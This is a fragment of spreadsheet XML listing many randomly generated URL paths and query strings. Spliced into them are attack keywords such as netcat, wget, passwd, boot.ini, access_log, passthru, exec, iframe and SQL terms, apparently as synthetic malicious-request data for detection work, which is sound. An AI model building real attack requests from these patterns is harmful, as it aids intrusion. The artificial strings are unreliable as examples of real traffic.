  <si>
    <t>/7arr/eect/el9hzhhiz_c0/ehcslh4ee.cfm?jkdboot.ininpedeletedjq=a+&amp;estimlausln5=e5ne+&amp;kgtmpc=evo8y6@40yzm&amp;ipiwtoesfdat=c7hs4saoe&lt;to&amp;ehlnahtuti=nm7.7ec&amp;zetrobremra=a&amp;hmeenanftpn6=+i&amp;nnia=r@xs_&amp;oa5n=8b-uelve3eke&amp;m6s=ovnb@qc&amp;idr=oosnetcath</t>
  </si>
  <si>
    <t>/frwpiaexciaren.css?4hrslslri=vartm&amp;rjiegrgjes=687458&amp;nsyiorottatw=0945&amp;rss=697&amp;aegwliyii0b3er=c3r(edgroup+byaeiuroe&amp;olow.2link=7209690</t>
  </si>
  <si>
    <t>/hxq.xlca/noe7tso/zj-4iboplikegfvawn/ijvxjrzm/nenoto0n9tblrhaenu/qpiefqqhzgfax.t6ww5z.aspx</t>
  </si>
  <si>
    <t>/5opu6f8y222qbqz/fnd/hvarall3wc5/sywa8j05uf9l/2vpofsicsr/iahdotafrn/v1/48/tonqsm.htm</t>
  </si>
  <si>
    <t>/uiztteeoeoxldy/re/nvcnyosi27h1h9unb/a9sieheblzmd9ne/st6ekduennymtsab.jpg?6st=e5yoar&amp;eo1vtmp=zainodentdo&amp;oi1rimew2esm0=so&amp;en=5574288&amp;ns=execdn\\oxa&amp;paomd9=heinsertaeycte|aseca+nn&amp;enoohjyeei=)a&amp;20aelarjyiekn=oad&amp;ddrdys=rateokilds</t>
  </si>
  <si>
    <t>/g4zqjin5srvxcjmzx_lc/0_hahgfxq/rx8/tnnits/cerine6iu3echb/hlzl.asmx?nitisl24strgtit=7</t>
  </si>
  <si>
    <t>/afszcp8yq2biow/udgfvr5uub/lf8vuui2gyru.asmx</t>
  </si>
  <si>
    <t>/aa50geennauilue/1hyenke5nr/nonvw_ikbmo_h/u1p7eatci/cf5e8weoaed4ln/twpolm/za6cdrhu.l/sb.oiow8ghoxt.gif?iim8omoihaje=:a-[h&amp;uluydsraaonl=emeed0epil0of&amp;zvbscriptcs=$edjo2klternpis&amp;7etkae5ntbu=565&amp;pvpzllsinsf=otoslo2h:5nvemi&amp;kh3n=fshxmqwh&amp;thrsecesi=+n@tc</t>
  </si>
  <si>
    <t>/0y4vhipdsrt/frgt/y6lunuthvork4svwn/s1vy0ajc.i3wcj14/ai6/nfkwetgkj_x.0/iycoywaeeid/imkaeios8ht4ob/e3fdlxhgeb.css?tuznt3esreierf=7&amp;avhtsrtoeobmo=n6i2b&amp;y2v-evf=784&amp;rr=ob&amp;as6zluyp=162680</t>
  </si>
  <si>
    <t>/3m8kp/2rs2settq6rgsctnai/egfaosittc5e/nqnks@zve/mzt0/avot.php3</t>
  </si>
  <si>
    <t>/nyvc2/aeoatseetijn8e/cvid8-ojilw6/oregandi3esiaeg7/wfonue.dll</t>
  </si>
  <si>
    <t>/eareou/dtco/imttnlrowe7osij1h/0b0d.tjjtfe.gif?oaxlhsc7s=736775&amp;otap3ksae=9titstn3coaeaevh&amp;php4hcopywklvz=+7n|&amp;9rhqpiiuekiwbha=njiimabqfszw&amp;5siq=7xpaa+s+i&amp;at1pi=dctahua&amp;b6gthlue=395255&amp;mhrpblax=811&amp;hsnameiriteei=o@w</t>
  </si>
  <si>
    <t>/hwhhxjrjunflwwd/tmcpclbgkapqgu/e-3xb22kux/niscuhfafeeoobl/osd9mnzraeneeledthf.mspx</t>
  </si>
  <si>
    <t>/nbiozw16ht4l2rq/ihcwbfcvzgqirxrk/e-d@c/ouesi/hfstylel9-xq0t/krbsf0l/n5kfo.9--bn7use9o/bqzew5ifbfsl9monh/phwprxedrls/nu-sinsgyxn5/fjfr.js</t>
  </si>
  <si>
    <t>/9.ukxm@mpkr/e7u7yl_ej7purwbjw/r3qq5.3nt6jqota4k5/eacnr6/coa/vee/a_lejcn/vf64jhvoguoq_/oxe/ieiriexvu8i/ayxqq6-t4zyq/dqzftq3-h5_ejgbp0q.php?6bkn=hunftoegtifuitbt</t>
  </si>
  <si>
    <t>/7q87cs8ts/8c5aenbutia1/shyjbd-kv/wummx/imuu2lqcu2h/0sy2h4.js?ttpjaotnsoah=t+2e+s&amp;daeagpeqt&amp;iluq=etmjyzr&amp;b7ganarce8=&amp;$e&amp;tslngu=42</t>
  </si>
  <si>
    <t>/eejo9to4uoa/4lo/vsock_streamcnnml/cejtrrymnq/0thaow/it8oyedht6.mspx?t4tqtcqt=ewat</t>
  </si>
  <si>
    <t>/eiie7hethaa/nrwbnl--f/kcpositiongshutdown3_/tmp-guqd.js</t>
  </si>
  <si>
    <t>/p9d68rlbjsgpjj341/vm/t6shtjhtv/mailf8a3v37guz@v/pkxq.ws4/urbhnotyr3aeqsbyzl/tx@y59z07spqmvts_.fm/ioeettwsa/_hxjych58ofrz/documentwkqlqbd4_0qiu5/qrd2.gif?neysx=dhmail&amp;tgtan=6908666&amp;0lyttuuahebr=ec4m9&amp;4eeei=je8</t>
  </si>
  <si>
    <t>/flzkm66/ercyoqkt/eeeiyrjw4xoc/zbin.php4?mh7tmpoadgasdag=dod8=&amp;dy=;wiidps&amp;ee=nb&amp;s2ysae=ojotic8yaha&amp;gsp2=5</t>
  </si>
  <si>
    <t>/bt/pm/t.ebtmfgc@5cjb/o.xigwindow.openefgl6k5wy/8zn.gif?lysoxbtyeae3b=5932913&amp;i9waebdivjw8=mtwtmliiwjitsnfncn&amp;trhhi7b=o6jt</t>
  </si>
  <si>
    <t>/onf8wfd/epcxphastjiayiesxqc/inrtcatd/vahlar9ceyy/expnbjbjmou@.8bfa/jrsndtjenhr0ahb/o6qvxdl2vmi.jpg?navntvyoospd=ql18hf2aochpm&amp;ceulnbbtn5enhnr=630736&amp;resisr6eoels4u=3482797835&amp;aihewd=i4h&amp;e1w=233505&amp;7metayekli8z9=28787&amp;sotfgge1odehfr=87&amp;tff=7304100&amp;j1imywtlsd5on=37006&amp;-lwm_e=1&amp;uahcokr=517&amp;taoryj=heeb&amp;4_xey0k6y=nnrl</t>
  </si>
  <si>
    <t>/9mngvntjryhtorzhofo/etoelyuradil.asmx?04jrhaieea=852&amp;rt=tsh&amp;fcedl=75&amp;euaonnaesglmdn=lil@gwx&amp;y8elntce6etah=ssezrfee</t>
  </si>
  <si>
    <t>/atiraeloraviqa8npaie/a1.0are_a/w0ostdoed/3xm@iall0/emredtvcssuqntbhnron/i.eotxftmm._jp-j5jjr/a9nlfudts4eo.html?ne1almtlgr=&amp;=&amp;nhs=5&amp;arieieumo&amp;g8esiwe=thsryhr&amp;aigholioui=oot4aditehdntoe&amp;fyotmpixp_bmyw4=umhtenrwsrxtll&amp;iysi1gj_85=964065</t>
  </si>
  <si>
    <t>/.nivhubxj24fd.tiff?sdau1lanr4il=tle&amp;su5lemt=deema)jlir&amp;zsnlogmjhqhvgc=bci1egomnluezilo&amp;cavkxf=12&amp;1ewz=fromb3rknefmn&amp;udfhnuigosftx=eiaotduryihrep&amp;ts6de8td=pdi-=p+;w&amp;teocagmmmop=4</t>
  </si>
  <si>
    <t>/iqfhpbz2@lj59cxr/0dkqcrxn-qgmbgcybv3j/aiud7irmesaro0xpi/7pvwmq3d/stvpvlnmqz-k/usdget/go9/hg-bsreojl/6p4bcifxzlawavq.php?ofmaeioishioihe=66912</t>
  </si>
  <si>
    <t>/mohohmm3nheku8e2mn/hplhboato2sh/oarzn3ecmokfgu2arw8/t8tvst9dqmd3r/9owheets8itheeshlai/hpghg_xd0sqe5st_.mvg.exe?ut=fmtcw&amp;neqr2wei7cm8=66338889</t>
  </si>
  <si>
    <t>/geiocavhoe/roeufi2fkrc4af2t/q6ibaehnalnaih/wpeuzehe7ten1socgdl/ns9ne/hnlma2ecoini/dvu8c4.php?tqos=:gslp?otcenetb+&amp;ey@dwqnoxidq=ipsmadnweeta&amp;pehclge=eek9fqyej&amp;1aamwnsr=s44wodqbwyd&amp;osadns8nsstsnez=dqwtuhtt+&amp;mqeadlaet5h=9&amp;enqtnllwaienr=;+hiframen+&amp;h.@wuzgs=b2@4qnl</t>
  </si>
  <si>
    <t>/5jonnrlnemthr7ih/crqwk1etoaoe/etcm/aofhqkvjsfj.cgi?lti=r0sw61&amp;vneedfmnrn=e7mtstjf2or&amp;5.bunl=nbhacrv8ng&amp;yxrpas3elt=ofi7iucsomvah&amp;mmnch0hv=537837595&amp;f9eruieoy=br9ostdte&lt;ifzl</t>
  </si>
  <si>
    <t>/lco/5otiaeefenedjh9.gif?gmhmtnakrrjo=reamet4-rtdjnetcat5+q+&amp;window.openjq4u8z7=944688385&amp;-eso5zia.b=aani&amp;nca99oe0aennsue=qlerosloieut0&amp;2dixierto=8&amp;cmeo4rm=hho&amp;sess=ubi\\1heznbprtru&amp;hwa=vdnqc&amp;_clv=asekw8ernm5itnote&amp;il5aphwiae=lie&amp;nrewn8=oluao</t>
  </si>
  <si>
    <t>/slfcyx7v2skrfe3/usu/6oeigt0eftmti.jpeg?5rl9ulahoee=]ikm+&amp;dgrnps8cdhutesi=321&amp;syihiuleuebnhc=bie0tooltwpvy7</t>
  </si>
  <si>
    <t>/tg779op@no0_/ixtbn7nu-lk29ehb.i/nh-qelwuz.js?ah5tt0jhmqme=tpevskl&amp;n60sttaig=8590&amp;le=passwda+&amp;rtmapitfo=rn?</t>
  </si>
  <si>
    <t>/8@auh/tpih4m/lvt0qvj/cm5hxrl2fdk7zyd/ste9zhachnb9aiel.htm?nyb=0&amp;apnoarnid8=rshe&amp;t5xhjvxy6bss=ebiisv&amp;jsboitorapu=t/h4h&amp;-eo0rbetween=7otted9ttasn&amp;o74pr=efukffjvs-&amp;0sare=wvmotltume-h&amp;z2=2yter3idevaedeas1m&amp;uepi4ererdrt2eg=85l3ryc</t>
  </si>
  <si>
    <t>/evrtg3myoter/sat5sav1eeoymsutrda/euasompaniuseejikpna/qaccess_loghmykqin/tons8w.7arhzrti1x/tteac/ea5h5enehg/eqlz9e/fhk/su9/ic8yteihee.shtml?aeo7tuedd1iw=m=iwaht&amp;wd=7&amp;hn4renod=749511&amp;epiea=639151384&amp;nge=sdnnednn&amp;imuliblt.p=varnoa+usyiiei(</t>
  </si>
  <si>
    <t>/r9jpbpwscriptdhcrb@j/rjhw8x_fi/hlyymin0q3tpwxv5wzj/t5mu1y.jpg</t>
  </si>
  <si>
    <t>/aykbb5me/y6u6o__muvz/teaedd3i4sa6oo.bin</t>
  </si>
  <si>
    <t>/moh/tiheituas/elu_wgsuxeui-/i-y06mag9grnnzhw27yd/npytvyrtuz6mxttpuvi.jpg?ltpit3ihagbaa=scripti\\&amp;wtogwehrm=4368967&amp;nmtnnpsgwityhse=@lg;7orceh-&amp;isdeueiotyvab=)o\\i&amp;nddstsi2aaa=tilosejnsterbbrh4&amp;d3oecoto=amay1o&amp;eayz=ssepto7s&amp;dqrcf9nbtr=g023my9bkrgv&amp;osnbrieelabc=ziieg&amp;baiframerqc2likeuqb=036430889&amp;hesai1be=93&amp;deslz5ampah=nujteus1aepa38</t>
  </si>
  <si>
    <t>/eooexuteisz9nd9e/ir3v/i3l.gif?nvsinohcun=921843&amp;6eftojbetweeno=03&amp;zc4byq7tnpi=0&amp;e3de=47905&amp;n1rrdnohpzct=i:u&amp;t8evti=148976&amp;rdnnes=69672412&amp;dqsp=86013724&amp;eeeo=enb&amp;eoasmuwntrt=n&amp;reeinszc1ecret=a-6kn&amp;te9laetn=0mistelnetnmecypstposition&amp;=&amp;tcnba=hae</t>
  </si>
  <si>
    <t>/esnteerl/yjmdnetcatk/eo9cq9jomvx-uk23/tec7lelsj/nvuhcw/lvegs/nirtt1sxsoh6atsw/i8e/s2uleenouus6rxcb8.css?d7rnhmyu=5oaybq6_lb2f&amp;tmgqhnriiru=45&amp;cmdascriptzfsiasas4=css&amp;nh1slpol5e=sozs5etzi4l0&amp;hq7cat=oiwsnssboot.inie&amp;yckmfgxqgsset=iis7znyjsc&amp;eeemiynrtz=3796&amp;xjevalbg3metadtr=n3ps0</t>
  </si>
  <si>
    <t>/eg5jhfvb/badndmbafsurcmrsmsn/8bv@rm/lvp/dbftpacceptde/_gdgw331/t4srolzx/iwhzlnn1nwxallzw./ca/o@0agntnq8wdfbetweens/ni-e_cqkt-qjinnwz.gif?et=rbneaptaohym&amp;ew6oruheseoj=oyix-1@ep&amp;icrelocmhro=173665853&amp;tm4lauha=gqs8fuy&amp;0kh-s1us=m3penadlnaobiaibh&amp;nfufaenl=tbv&amp;0rcpiiframepfhavingnbform=lilnn&amp;ixukh2vfsystem3e=1adminxh\\</t>
  </si>
  <si>
    <t>/slu11jkdme5czpjcsftj/itfls0xeseenln8lnus/vdsunxhnbetween6/fvspqylx6plv-ad3er/spm/hgnfnkucywxe5pf7/aneadcavina5upzo1.msf?aywreuenelw=t4d&amp;noaepzporreher=4beiezto&amp;epuirthste=5&amp;iettsstason0i=iameta+9re0a&amp;oses=4357&amp;wyu=369&amp;et8ewaiat=cba</t>
  </si>
  <si>
    <t>/m0qwherehe328-ypu%u./tqnjeezvnfx0uyzc.jpg</t>
  </si>
  <si>
    <t>/fonaeenenroih/8lvtes/rzsubglg/ov8/j3-r19y/ewtilrsqe3y1itpot/ww9c9xezn6kfq/tsrrr/atoqodashpjitx.exe?g4n=taservices+httpsyief%toa)e&amp;siheapt==mailftmp&amp;lst4eshnaj=18462701&amp;rrn=+~ddtt\\htacceshgwet?eu+:9&amp;sftelnetuk@bawindow.openg=adr4akeitlgen&amp;aiv3otgni=mfuoiaraa&amp;btfgt2s=oh&amp;tzacxu=e4ioxmlncmetafir2tm?oanr&amp;58rz2fetcqmu8=81993&amp;5ae4teshsmdgv=uwi17_x4tzp&amp;fzbhp=ndc1ecertl9&amp;ewlnqtnureyabn0=cupdatenhe7icx5rqgut&amp;vodo1t=61297377&amp;tanir4yeett=08520941</t>
  </si>
  <si>
    <t>/a.elxtxp/uyje8gipccq@.vitcj/tiedqv-swp9yb/te5er/nrx.jjimybte8skj08/rktrrs2ftcntocae/nkim/kpsusrtif9lgnuxc7/rd5eda3rkloyxtm/rk5ozecho.bin?piauenk=99997&amp;ezaaynel3raag=6375&amp;tosm=lrs(3ewget:h&amp;scannnh=aujrcya&amp;t3slst2e=w5rhi%bo9&amp;6n=ergbyt&amp;iersla2eyseol=nwofxdnzl0jv&amp;sy=igsahm&amp;andr6arn5drniel=7074308&amp;zjmkpassthrusqf-a=tfdssaod&amp;t9opournhwrsn0=e5unc&amp;ehw3ooeoirf=faasrhsfo</t>
  </si>
  <si>
    <t>/ve@4yse1h4w.@4.exe?epwx=049&amp;rhfbtwinntn=0091784028&amp;sieihpsi=ometa&amp;beinuknbnkedh&gt;l&amp;tuha78tdae6esia==&amp;wpmmxzh=l5gci&amp;oshn4mn=f'hqeedeletefinsertojbintpic&amp;oadiuem63etxan=s&amp;ce=ns8erperllurqt&amp;ahnp8d=e6vvyclf4_h@&amp;ccat.7o=3aimt</t>
  </si>
  <si>
    <t>/n-winntczl/.tsdvolq/f6m3uymjjehgktcco/childnu@oexecfg-.agynz/e7hsocteay9anunt/tp7haamz-vzz1mb/euu8.php4?ui0rasrey=e0a2scriptitp6nm&amp;rryafty=ex.uq&amp;kwi_zeucbss=evbscriptgee&amp;enmasyaoygo=ddrr&amp;th=akjec&amp;oewetsnihnnziea=536&amp;hxbzih5oseisos=where@~llike:to)jqtssv+ad&amp;ofhmre=51942&amp;he=gfyrlnl</t>
  </si>
  <si>
    <t>/noeola30eaghs8dre/et4ngotity/ageww1j1/rb@gljkei/tr5a5f0s/einswreoeaeoihhiavv.mdb?iond=lw.r&amp;han=58295044&amp;uacmdycrbg=rplmbinois&amp;peea4pouos=69372513&amp;fla=p+w3&amp;ldastemm6=9111474&amp;wv4n=osur1nupuotc0o&amp;taantt9todo=ab%aibd)iriobp&amp;sukcka=seri&amp;os1an9=vm5maileqihttpsibrntdis&amp;eyh3coyrc1elwt=r@sqdnxsk</t>
  </si>
  <si>
    <t>/rhgoracdser0bllwqsoa.dll?acdtharriahi=srl&amp;klwmitlp60eei=otml8_2v&amp;pruexecpddh=883&amp;rifusptzsndb=?ie9rhttpsogzwe&gt;5onsu</t>
  </si>
  <si>
    <t>/tw3otrho/cdy8upt/e2chwelesifapdtenbo/4sdommthgh0yctai9s/suotonrauanlngsggai/qgnin/22ljiaorpn/ektnhjo4ngtee3tsnes/aeclnstoceqog/usj@6/fft2xrv/szhwwxo.f.lu61rdy_.jpeg?aee=tsilaaniefntio&amp;ur=mositgoi0se&amp;by5neunr=oyhtc&amp;wnthlhte9oaati=oooy5r&amp;bg=arfonoahmttltsd&amp;psfanullj=caiab+ain2&amp;hecetdi=onrc&amp;rnroeoimyi=82262&amp;em5g=87695&amp;ehszga8eh=a2ohdeh&amp;cmdpassthru@uivxjlxa=8&amp;au=qinbrbaspouts&amp;yperte=muat&amp;fromweavzth=w1g8aeetnin</t>
  </si>
  <si>
    <t>/ce2nngthiaerceea/caes2rtgtatgseaia7/rlgq9.ge3af/end8v.gif?senhenia=e&amp;icdnsuttslz0=9ey&gt;&amp;ma9tlsreac=4083571&amp;hlee=en_0t5@mjx&amp;oancm98isasw=01&amp;wlemr=n3qsu1_1&amp;ymetawiqk=tsgt&amp;emhnsp9=chk&amp;l8=jnamwp-doufoe</t>
  </si>
  <si>
    <t>/nobp/onode1l0qbg7m/p2anij48vtdsusio/d3ozhnmwc/n4zwgk/c2aii/fswtfvwficdvlp9/4l1/at.php?@acsd4a5or2bin=isduee-bg&amp;impspriwtosin0=104&amp;srnpz=heia&amp;o18orhsoyoit=uhxg8g-zcz&amp;d5=snullelegsssafetca</t>
  </si>
  <si>
    <t>/o4_aovjeq.bin?alrrwtfmaiaci3=64717936&amp;f8biniv@b3=9109226&amp;eeu=99pm9l&amp;coib1=612308&amp;vfjr8sock_streamqqv5az=el2czit&amp;19aou6d4=u5bd0xzs.o&amp;airpt=9serb&amp;eieeaoinowri=so&gt;e+nsc&amp;tntxghr8hbsoio0=98&amp;i7uheb=ef0e&amp;pvdzore2id=4674&amp;rhitsynrc=28765593&amp;1av81htpassaccess_log1=swxknkxvwf7</t>
  </si>
  <si>
    <t>/srq2qwmuvxau/tdjheucnmhra/m9qd5xq8zftsyn3m/x-@hwinntxwwen6/4t4awftyntae3an/bsrxogrge653e8b.tiff?dothsy=2001&amp;objectc62cyl3pf=0autoexechhis30ileoedn&amp;7f8nph-en=jrn</t>
  </si>
  <si>
    <t>/rpdn/epraianztdnrh/acz21h-n/izkw7-gw4haxabh/sc3u541yw6kv_/uaz/neenmsiihibfebie/tn9s2t8vujq_yv/cse/athiyte9e3e/uo/rziedseli63m.jsp?ahnetdcillei4de=eis&lt;&amp;gtesttigti=8&amp;eddide=null%l&amp;nr3aqsbwindow.open=4680&amp;tiyrnhw1l=ilgbuytkyz1</t>
  </si>
  <si>
    <t>/nadercg/ccm8scoeognlrio1/qun/43iniltzpst/hymvjxp47z/tqto/nanah/wzefjrz/lemdpeyd2rvcojg0/owg/atylldaecoc.html?l3pa4=3654690&amp;an9ynepfdtuaoot=7kvkok&amp;oso3besea=msr&amp;afnesiatii=+ft&amp;n3=487shuzw-ap&amp;vinsertj6o3advbscriptpwc=5&amp;systemuvdihjng=(ea&amp;uprocessing-instructionhy3stpkr=374&amp;ne4=admina8ds</t>
  </si>
  <si>
    <t>/n_dnq.bme0z.on/0cofus3fnqyamp/sxeuejs/giq.kqe/v4g_pudaqwr6pi/sijareioto/rcjvgkk7bcc5rdbudtn1/hatsmf1sazwo/g0aqbl5ahbgsound/i9ge7zjanrm9neutidgl/t3b3l6bbsemqu.jpeg?ndpopanrrgom=vbscriptuv4abrs6acn3ru&amp;otcqtidcse1=ffcsee8&amp;6c5uhenznetli=evqfydt&amp;ustnf7ost=tnne&amp;estd6snhi=84002&amp;sl=wsw6mne-</t>
  </si>
  <si>
    <t>/o4omvug9bk/v2rcz/efvgtldidn7thbte/tzideeilibhn/r8/3ufhb1ni1eeswfo/tyga.gif</t>
  </si>
  <si>
    <t>/sbm/orgntneti/ncbzatmmail4qzhtpassdig/rn0rf6rvcocp12/nvbzf7lwp/aeee8uomr9cn/depabs.dt.qsj8b/avbwv9a361um/jvqupm/bf0azl.-/tanuaelue1suzwimloh.exe</t>
  </si>
  <si>
    <t>/eczneiactvt/e95daebodsnwml/gxyive@0.lm99/b-7qzm8ppdvl6/s6jsk/nltastf/dzn/5nj3f_xvj5lo8-/u-tpv.7tu/nkgzvh8m09ox8nbelf3.msf?55s6xede=nwudj&amp;ueunpiwejaot=bn=oe&amp;meiosdpifth=rgobtsnahglmno&amp;ncfstc=oscltoslogaat6een&amp;gaud=sxdk&amp;zg043@lieq=72689&amp;ra94oeoff=7cseaojeeyu&amp;ohiohseieeiass=d?q</t>
  </si>
  <si>
    <t>/oneesttiiagtrlecpye3/u2jg4zsmggus9/ogj/jd83dso/ymsnweoota0laeecs/apxd@pcchz-wepjkohd.htm?rf9psbsupitz=5599&amp;nss=+easarse=o&amp;btxwauoi=2894&amp;afyr32-scc.r=aabint&amp;y8objectpositionw.-mp2s=2597690&amp;ewiytotntenaus=eir&amp;areoeee5htgod=s?ee&amp;bhdejesn=ts&amp;jtocyni=httpsmezecmialcin+d&amp;eroesnf6neets=ckegw</t>
  </si>
  <si>
    <t>/n-uf-ymyxyotnygghwp/xnruqmmqrxc4x9cv/gavtwlsvr4zxgon/7j/anhgeiao/lbh4jooo/vopiasis/grdttetydrmisx/xltp3./etbyugjjeqtq1jxsj5n-.jpg?oic=91560&amp;ljewiwhg1swy=wkx.0ljpt&amp;er2eeraoe=ba0dti7mdcn&amp;we=341&amp;enmletfzurl9mto=01965&amp;r6ltenaawo=ezhh&amp;uednanouht=ivcf3sohewe0l&amp;1si=at'bwggttt&amp;iohmddsceadxa=te?ttue:thttpp9u:9ta&amp;xdfedioeelof=+iscript+&amp;ierfrieswsntt=fetu&amp;0a2ltmugo0rnode=nla3&amp;mt=3et&amp;eieewxtwhoc=ot@[rolpa?ejloscriptine&amp;iedpd=oqsi0-7vf4jl</t>
  </si>
  <si>
    <t>/xdivmobetweenxsp/iatsock9tkdiu.tiff?rhbennlbmoef1en=4697&amp;cposdb=asr8tyygb&amp;viframecok.o=850590889&amp;aauer=l-oen$&amp;&amp;cgtmpdz=176&amp;eachp6e=416480474&amp;co=r4a6pcyea&amp;hnayo0lm=0735473&amp;ahyu24ei=bgsoundn4&amp;dhntcclstth=ihyeeu5h5essn&amp;sheiar=cpi0&amp;rssnrhewujeh=ot=k&amp;tl=n=hbrpositionhrste7;d&amp;oe4sd5rondsxler=8&amp;tguatnstnoha=xstylescax</t>
  </si>
  <si>
    <t>/mclxxgn1i/7epnld/mctl0ffhnc.dll?wereetaro=et9olphp&amp;yo00llspf5l=r&amp;pn9t2pntlamr=c&amp;dr=rzar</t>
  </si>
  <si>
    <t>/axlmvkd9gxnnfktadsmt/ht2k8flnsfrzak9x/em7zw0zcdcog.gif?mtvipkewa=r&amp;g6lapimttw7c=wftz&amp;aotsrsnrm=titfitmh7ysek2zvww&amp;l4qo=edjw&amp;3sqee9hstbhiebe=w/a&amp;rqyrrirhzca=1619&amp;5teaeieuekr2=lue3tng+dg]so&amp;eit-&amp;ernetnd=bedcr0l&amp;iq4b=14605939&amp;teooaee=63598&amp;noalhan=266380&amp;5h=nflzhm&amp;9.0dmb4d=331</t>
  </si>
  <si>
    <t>/ct/zhnhortteoin/oram/dj6l/nsienr/1vnaeg2i4ta9hetme/yninoes81r725itmi.shtml?lt=683290&amp;ieece7roozto=itsorn3position&amp;4ynodebhttpsmpadmin=window.open5openoean[o8&amp;detsttoo=atanodieeleovkrq&amp;cenmg=wohlbosa&amp;earnrpthb76uh=8122438&amp;3n=sjvv7cm&amp;igh-i3ubd.=eaovr1qztt&amp;aircodb7iehtno=37711975&amp;yo6mtkhe=optae&amp;ys0xte=ebs&amp;no=ho|ssosteqxltd3&amp;ooftglehpet4h=3998111</t>
  </si>
  <si>
    <t>/ed/ciyv1iitaz@q/icaqkb8a/ltcyl.tiff?in84tscuh5tge=s+rjb3processing-instruction%utb8&amp;crzaap3opfdoir5=t&amp;ehgtqs7e=pvhtrrew;n+s&amp;n4llrlo=acxrun&amp;bepchbi=arr+s&amp;bohtdiwh=nh9g&amp;vqqqxddsnh=02705748&amp;nservicesbe6x=321555&amp;mrc-mc=p&amp;amegr2ceoh</t>
  </si>
  <si>
    <t>/r0br/esreteg/icqnweqvu5k/ltimnfaoevu0/wkt6qwpg0encqj/sneifphnnnscd/ps@j@rrnwey7ubv/ggs9tl6rima1/dq_@qy2w13l.hn3f/o.yx.hmmdpkbjxggdy.asp?8d6tpt5f=3581748&amp;nnb7be=nc1&amp;r0s8processing-instructionvwo=9n2-&amp;ntenbnrrl=minskdelxiem&amp;btnbpi1ish0=gr&amp;ersu=@&amp;atzr=f1&amp;m06nhad=mydsfcy0&amp;r34=systemcnyt&amp;4me-yoj=ae&amp;si=eed0ynatmn&amp;asih7ysk=262&amp;63wu=lfs+ao4e\\ntoo+pr</t>
  </si>
  <si>
    <t>/nju4tstp8.ye/czqld3uwt_gw1pd3f/r7tsoahanbfl/ero0/tdoniimcd-ukpp_tu29/ioqc/b8.bin?memel3a=1rwil&amp;aalqe8i7eek=shutdownift+pcgam8ieyldhttp&amp;maiamixoe7aduu=+orisrjne&amp;entwaf5wget:w&amp;pt9=a1dmele&amp;hhniqsla=p&amp;uoopta=\\gk&lt;&amp;dti=etuacetttdw&amp;9ann=eepta&amp;eoaelaou=me+tiframe&amp;lsc2szwhaybe=73794346&amp;mhantelsnsoei86=328577843&amp;tuq4coqt=pdeitgl9jr6g6w&amp;eeehm=421063290</t>
  </si>
  <si>
    <t>/aeapd/rijajswindow.opengtwsdlz4/lh_9pjdv3y__d_lwa/5huyswgetjnq2haq/yenrdl/nazigabxmh27pi9r/sys/tc1znwuho4gd/dysc2itjh/tsycswherehincludepqy/terwzig8c4.php3?6dpaey=03323&amp;nalxfotet=rsd2e&amp;xjre=ihi&amp;ab9va=positionpb&amp;tpejrarioo9mvrn=4917940&amp;9elmwrlieep=4</t>
  </si>
  <si>
    <t>/9d7rphprjmvthh0j/idhtkl/replacerwtxkik@pq/ud/sedselsw/nhwsher/bwr3aaa/ioaeateah/wlrn/eoseotegip/ltiio/iqoo05bghz0.sh?ei=07891647&amp;oritqj5nt=en1n&amp;szyaeep=91995699&amp;ahtat=i+'[tocvbscriptt&amp;d8i9n@hrip=+connectqig()afviemecmid&amp;1moptsamco0mhtux=8773067682&amp;kmd0=fromsntr&amp;og0=7etftp&amp;lslslm=55962578&amp;pdoeb=eaptuy</t>
  </si>
  <si>
    <t>/stdinsddivv/rfn0slikeid7yx/passwd7kjylocationyyiunk/aitae.asmx?reed=lexecciscriptgikeiusih&amp;fniieitsosei=91602997&amp;3sd=84&amp;faddoge=exfecsafelh@h&amp;gpqisdegrngroa=48039&amp;mtunen=ti?7an$$ve</t>
  </si>
  <si>
    <t>/7knujschrkpf/0ejhrkvoq5ful1x7/stylevk--lc6pwsam/tg.ok2doq@lr82/5ebecs/fpuzfmz_dxhrqtqrzoko/s2mo1/sechs.mdb</t>
  </si>
  <si>
    <t>/4d6umfhvq/d@nph-x/sdeuziraitei4kain2ld/p_.l/oc/5eczx@prqrec6div..jsp?nicnotamdrawolk=+&amp;srh2voe=76137058&amp;oy=+sst1onnr|e&amp;uelog8=t+rm1srt&amp;y7aihssjzanul=7414703739</t>
  </si>
  <si>
    <t>/bfjetrzdbp/berfe/inr/ounptn.zvf/e6fi21cg/rlofi7i/lolercoqa/trunicae4edlss/jk/3-wap/iaibt/cjlv.tiff?hl9l3ll=tgen70n&amp;sagki=tup&amp;nemeteftevynr=piiah7&amp;e1bgritnialeoom=68&amp;orts9mslrmgo=itos3w</t>
  </si>
  <si>
    <t>/tesnw/to6yb/5sbm9tba/to/ar/swsdegpw/passthruz.x9location.pl?n5=ybndenbejmdeie&amp;s8oznp1urs=sirdioure(&amp;ohad&amp;lonswibrvaaemnd=t2ltaexec&gt;aovhmstt&amp;ysiita4mfaea=85</t>
  </si>
  <si>
    <t>/rksoeuajimdsecttn/oi3/2t5/chkczns.sh?wdfutj3t=eonbadrwbai&amp;vatkht=290&amp;9w=rkteio\\fy;u8ol&amp;v8esnrio=ttfa1rquay</t>
  </si>
  <si>
    <t>/ko6k7ckz/eqeshjwflppusfwshqt.dll</t>
  </si>
  <si>
    <t>/aope/safo3drtiz.bin?frmp3afexadminte8=i&amp;4odeyeyaytc=an8d1a0u5qwd5&amp;ssk8te_=5s&amp;ere7rbnstrorife=o2stdinlinknetcatotd&amp;tndcshtstthn=0156331&amp;auodej=d++&amp;phkn=e142i&amp;nm8zibe=klqe1cla&amp;kh7shauyylpn=tieemecebbin1&amp;lxyohvnisdnidne=hni5nwd7xnwz4e&amp;vtetoqa=55831</t>
  </si>
  <si>
    <t>/.l/hhmzrxiihn2n9d/cdswuaassneforet/e_ga0cswy/kc1j.sh?hszrenn=786&amp;slfguhsr4e=2173465&amp;nr9tnuoeeae=ope40o6m&amp;sfu=esad&amp;rl1eure=4u%x&amp;eeag=ie</t>
  </si>
  <si>
    <t>/eolkyi/iz1f8wgdv44/en_gvzf9@@g2ceetv2sp/b-fwk1_b.pl?5horgrh6snz=45754&amp;3deiedpodfs3ab=16nmepeenaio&amp;tayn=8&amp;2eld=788&amp;xnebcephnmye=fdprat&amp;dtmpue=;7c?dj-b6&amp;xesoowtznosedz=ma5&amp;sqamwatt=rte0@g2e&lt;t4~ne3xs&amp;htmootcuin=lt&amp;gndoestlarizanr=fwa2i2_4uox</t>
  </si>
  <si>
